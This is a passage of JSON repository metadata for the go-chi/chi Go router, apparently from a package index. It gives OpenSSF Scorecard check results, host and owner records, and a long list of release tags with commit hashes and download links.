pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-